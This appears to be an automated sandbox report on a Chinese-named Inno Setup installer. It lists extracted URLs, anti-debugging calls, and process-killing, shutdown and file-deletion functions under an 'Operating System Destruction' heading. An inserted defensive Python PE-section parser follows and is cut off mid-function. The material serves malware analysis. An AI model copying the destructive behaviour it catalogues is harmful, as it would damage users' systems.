Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1857755927.00000000040D0000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.6.dr, 7zr.exe.6.dr, update.vac.6.dr, update.vac.1.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1857755927.00000000040D0000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.6.dr, 7zr.exe.6.dr, update.vac.6.dr, update.vac.1.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1857755927.00000000040D0000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.6.dr, 7zr.exe.6.dr, update.vac.6.dr, update.vac.1.dr | String found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1857755927.00000000040D0000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.6.dr, 7zr.exe.6.dr, update.vac.6.dr, update.vac.1.dr | String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1857755927.00000000040D0000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.6.dr, 7zr.exe.6.dr, update.vac.6.dr, update.vac.1.dr | String found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0J
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1857755927.00000000040D0000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.6.dr, 7zr.exe.6.dr, update.vac.6.dr, update.vac.1.dr | String found in binary or memory: http://ocsp.digicert.com0A
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1857755927.00000000040D0000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.6.dr, 7zr.exe.6.dr, update.vac.6.dr, update.vac.1.dr | String found in binary or memory: http://ocsp.digicert.com0C
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1857755927.00000000040D0000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.6.dr, 7zr.exe.6.dr, update.vac.6.dr, update.vac.1.dr | String found in binary or memory: http://ocsp.digicert.com0H
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1857755927.00000000040D0000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.6.dr, 7zr.exe.6.dr, update.vac.6.dr, update.vac.1.dr | String found in binary or memory: http://ocsp.digicert.com0I
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1857755927.00000000040D0000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.6.dr, 7zr.exe.6.dr, update.vac.6.dr, update.vac.1.dr | String found in binary or memory: http://ocsp.digicert.com0X
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1857755927.00000000040D0000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.6.dr, 7zr.exe.6.dr, update.vac.6.dr, update.vac.1.dr | String found in binary or memory: http://www.digicert.com/CPS0
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1857755927.00000000040D0000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.6.dr, 7zr.exe.6.dr, update.vac.6.dr, update.vac.1.dr | String found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1857755927.0000000004579000.00000004.00001000.00020000.00000000.sdmp, is-0C2B4.tmp.6.dr | String found in binary or memory: http://www.metalinker.org/
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1857755927.0000000004579000.00000004.00001000.00020000.00000000.sdmp, is-0C2B4.tmp.6.dr | String found in binary or memory: http://www.metalinker.org/basic_string::_M_construct
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1857755927.0000000004579000.00000004.00001000.00020000.00000000.sdmp, is-0C2B4.tmp.6.dr | String found in binary or memory: https://aria2.github.io/
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1857755927.0000000004579000.00000004.00001000.00020000.00000000.sdmp, is-0C2B4.tmp.6.dr | String found in binary or memory: https://aria2.github.io/Usage:
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1857755927.0000000004579000.00000004.00001000.00020000.00000000.sdmp, is-0C2B4.tmp.6.dr | String found in binary or memory: https://github.com/aria2/aria2/issues
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1857755927.0000000004579000.00000004.00001000.00020000.00000000.sdmp, is-0C2B4.tmp.6.dr | String found in binary or memory: https://github.com/aria2/aria2/issuesReport
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe | String found in binary or memory: https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe, 00000000.00000003.1796173002.0000000002C60000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe, 00000000.00000003.1796644119.000000007F1EB000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000000.1798850894.0000000000BE1000.00000020.00000001.01000000.00000004.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000006.00000000.1861362559.000000000086D000.00000020.00000001.01000000.00000008.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp.0.dr, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp.5.dr | String found in binary or memory: https://www.innosetup.com/
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe, 00000000.00000003.1796173002.0000000002C60000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe, 00000000.00000003.1796644119.000000007F1EB000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000000.1798850894.0000000000BE1000.00000020.00000001.01000000.00000004.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000006.00000000.1861362559.000000000086D000.00000020.00000001.01000000.00000008.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp.0.dr, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp.5.dr | String found in binary or memory: https://www.remobjects.com/ps

Operating System Destruction

Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp | Process information set: 01 00 00 00

System Summary

Source: update.vac.1.dr | Static PE information: section name: .j)q
Source: update.vac.6.dr | Static PE information: section name: .j)q
Source: updat4.vac.6.dr | Static PE information: section name: .j)q
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp | Code function: 6_2_6CA13F30 NtSetInformationThread,OpenSCManagerA,CloseServiceHandle,OpenServiceA,CloseServiceHandle, | 6_2_6CA13F30
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp | Code function: 6_2_6C893886 NtSetInformationThread,GetCurrentThread,NtSetInformationThread, | 6_2_6C893886
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp | Code function: 6_2_6C893C62 NtSetInformationThread,GetCurrentThread,NtSetInformationThread, | 6_2_6C893C62
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp | Code function: 6_2_6C893D18 NtSetInformationThread,GetCurrentThread,NtSetInformationThread, | 6_2_6C893D18
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp | Code function: 6_2_6C893D62 NtSetInformationThread,GetCurrentThread,NtSetInformationThread, | 6_2_6C893D62
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp | Code function: 6_2_6C8939CF NtSetInformationThread,GetCurrentThread,NtSetInformationThread, | 6_2_6C8939CF
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp | Code function: 6_2_6C893A6A NtSetInformationThread,GetCurrentThread,NtSetInformationThread, | 6_2_6C893A6A
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp | Code function: 6_2_6CA14B80 OpenProcessToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,NtInitiatePowerAction, | 6_2_6CA14B80
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp | Code function: 6_2_6C891950: CreateFileA,DeviceIoControl,CloseHandle, | 6_2_6C891950
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp | Code function: 6_2_6C894754 _strlen,CreateFileA,CreateFileA,CloseHandle,_strlen,std::ios_base::_Ios_base_dtor,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,TerminateProcess,GetCurrentProcess,TerminateProcess,_strlen,Sleep,ExitWindowsEx,Sleep,DeleteFileA,Sleep,_strlen,DeleteFileA,Sleep,_strlen,std::ios_base::_Ios_base_dtor, | 6_2_6C894754
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp | Code function: 6_2_6C894754 | 6_2_6C894754
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp | Code function: 6_2_6CA15863 | 6_2_6CA15863
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp | Code function: 6_2_6CA10900 | 6_2_6CA10900
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp | Code function: 6_2_6CA74CE0 | 6_2_6CA74CE0
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp | Code function: 6_2_6CAC1D50 | 6_2_6CAC1D50
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp | Code function: 6_2_6CA46EA1 | 6_2_6CA46EA1
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp | Code function: 6_2_6CAC7E80 | 6_2_6CAC7E80
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp | Code function: 6_2_6CA60EC9 | 6_2_6CA60EC9
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp | Code function: 6_2_6CABC810 | 6_2_6CABC810
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp | Code function: 6_2_6CAC79F0 | 6_2_6CAC79F0
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp | Code function: 6_2_6CA46972 | 6_2_6CA46972
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp | Code function: 6_2_6CAD2AA0 | 6_2_6CAD2AA0
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp | Code function: 6_2_6CABBAD0 | 6_2_6CABBAD0
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp | Code function: 6_2_6CABDA50 | 6_2_6CABDA50
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp | Code function: 6_2_6CA4EBCA | 6_2_6CA4EBCA
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp | Code function: 6_2_6CA5EB66 | 6_2_6CA5EB66
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp | Code function: 6_2_6CA6340A | 6_2_6CA6340A
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp | Code function: 6_2_6CACD5C0 | 6_2_6CACD5C0
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp | Code function: 6_2_6CAC76E0 | 6_2_6CAC76E0
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp | Code function: 6_2_6CA4A7CF | 6_2_6CA4A7CF
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp | Code function: 6_2_6CAE7700 | 6_2_6CAE7700
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp | Code function: 6_2_6CAD1750 | 6_2_6CAD1750
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 9_2_001C81EC | 9_2_001C81EC
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 9_2_0019E00A | 9_2_0019E00A
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 9_2_002081C0 | 9_2_002081C0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 9_2_00218240 | 9_2_00218240
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 9_2_002022E0 | 9_2_002022E0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 9_2_00222300 | 9_2_00222300
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 9_2_0021C3C0 | 9_2_0021C3C0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 9_2_001EE49F | 9_2_001EE49F
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 9_2_002104C8 | 9_2_002104C8
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 9_2_002025F0 | 9_2_002025F0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 9_2_001F8650 | 9_2_001F8650
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 9_2_001FA6A0 | 9_2_001FA6A0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 9_2_001F66D0 | 9_2_001F66D0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 9_2_001FC950 | 9_2_001FC950
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 9_2_001D0943 | 9_2_001D0943
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 9_2_0021E990 | 9_2_0021E990
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 9_2_00202A80 | 9_2_00202A80
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 9_2_001DAB11 | 9_2_001DAB11
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 9_2_001F8C20 | 9_2_001F8C20
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 9_2_00206CE0 | 9_2_00206CE0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 9_2_00210E00 | 9_2_00210E00
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 9_2_00214EA0 | 9_2_00214EA0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 9_2_0020D089 | 9_2_0020D089
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 9_2_001E10AC | 9_2_001E10AC
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 9_2_00211120 | 9_2_00211120
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 9_2_001EB121 | 9_2_001EB121
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 9_2_001FB180 | 9_2_001FB180
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 9_2_00205180 | 9_2_00205180
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 9_2_001FD1D0 | 9_2_001FD1D0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 9_2_002191C0 | 9_2_002191C0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 9_2_00217200 | 9_2_00217200
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 9_2_0021D2C0 | 9_2_0021D2C0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 9_2_0020F3A0 | 9_2_0020F3A0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 9_2_001853CF | 9_2_001853CF
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 9_2_0021F3C0 | 9_2_0021F3C0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 9_2_001E53F3 | 9_2_001E53F3
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 9_2_001AB3E4 | 9_2_001AB3E4
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 9_2_0020F420 | 9_2_0020F420
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 9_2_001F7410 | 9_2_001F7410
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 9_2_0021D470 | 9_2_0021D470
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 9_2_001CD496 | 9_2_001CD496
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 9_2_002154D0 | 9_2_002154D0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 9_2_00213530 | 9_2_00213530
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 9_2_001FF500 | 9_2_001FF500
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 9_2_0022351A | 9_2_0022351A
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 9_2_00181572 | 9_2_00181572
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 9_2_00211550 | 9_2_00211550
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 9_2_0021F599 | 9_2_0021F599
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 9_2_00223601 | 9_2_00223601
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 9_2_001D9652 | 9_2_001D9652
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 9_2_0020D6A0 | 9_2_0020D6A0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 9_2_00199766 | 9_2_00199766
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 9_2_001897CA | 9_2_001897CA
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 9_2_002177C0 | 9_2_002177C0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 9_2_001AF8E0 | 9_2_001AF8E0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 9_2_001FF910 | 9_2_001FF910
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 9_2_0021D9E0 | 9_2_0021D9E0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 9_2_00181AA1 | 9_2_00181AA1
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 9_2_0019BAC9 | 9_2_0019BAC9
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 9_2_00207AF0 | 9_2_00207AF0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 9_2_001D3AEF | 9_2_001D3AEF
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 9_2_00207C50 | 9_2_00207C50
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 9_2_0019BC92 | 9_2_0019BC92
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 9_2_001FFDF0 | 9_2_001FFDF0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 9_2_00205E80 | 9_2_00205E80
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 9_2_00205F80 | 9_2_00205F80
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Process token adjusted: Security
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp | Code function: String function: 6CA47240 appears 31 times
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp | Code function: String function: 6CAE4F10 appears 415 times
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: String function: 00181E40 appears 83 times
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: String function: 0021FB10 appears 720 times
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: String function: 001828E3 appears 34 times
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp.0.dr | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp.5.dr | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe | Static PE information: Number of sections : 11 > 10
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp.5.dr | Static PE information: Number of sections : 11 > 10
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp.0.dr | Static PE information: Number of sections : 11 > 10
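The rows above record two static oddities: a section named .j)q in the dropped update.vac / updat4.vac files, and 11 sections in the installer and its .tmp stubs (the report's own threshold is 10). Both are cheap to check offline. The following is an added example, not code from the report, from Joe Sandbox or from the sample: it parses the PE section table directly and applies both checks. The image it runs on is built by build_test_pe(), a constructed header-only PE32 skeleton, and the permitted name characters and the 10-section threshold are this example's assumptions.

```python
"""Static triage of PE section headers: odd section names and section count.
Added example (not part of the sandbox report). Section names are read
straight from the IMAGE_SECTION_HEADER table, so no PE library is needed."""
import string
import struct

# Characters that mainstream linkers (MSVC, GCC/MinGW, Delphi) use in section
# names; the "/" covers GNU long-name references. Anything else is worth a look.
ALLOWED = set(string.ascii_letters + string.digits + "._$@/-")
MAX_NORMAL_SECTIONS = 10          # the report's own ">10" threshold (assumption)


def section_headers(data):
    """Parse IMAGE_SECTION_HEADER entries out of a PE image held in memory."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4                                   # IMAGE_FILE_HEADER (20 bytes)
    nsect = struct.unpack_from("<H", data, coff + 2)[0]   # NumberOfSections
    opt_size = struct.unpack_from("<H", data, coff + 16)[0]  # SizeOfOptionalHeader
    table = coff + 20 + opt_size                          # section table follows it
    headers = []
    for i in range(nsect):
        off = table + i * 40                              # sizeof(IMAGE_SECTION_HEADER)
        name, vsize, va, rawsize, rawptr = struct.unpack_from("<8sIIII", data, off)
        chars = struct.unpack_from("<I", data, off + 36)[0]
        headers.append({"name": name.rstrip(b"\0"), "virtual_size": vsize,
                        "virtual_address": va, "raw_size": rawsize,
                        "raw_pointer": rawptr, "characteristics": chars})
    return headers


def odd_names(headers):
    """Section names that are empty or contain bytes outside ALLOWED."""
    return [h["name"] for h in headers
            if not h["name"] or any(chr(b) not in ALLOWED for b in h["name"])]


def triage_sections(data):
    """Both checks from the report rows, as one dict a scanner can act on."""
    headers = section_headers(data)
    return {"section_count": len(headers),
            "too_many_sections": len(headers) > MAX_NORMAL_SECTIONS,
            "odd_names": odd_names(headers)}


def build_test_pe(names):
    """Constructed PE32 skeleton (headers only, no code) with the given section names."""
    e_lfanew = 0x40
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    opt_size = 0xE0                                       # PE32 optional header size
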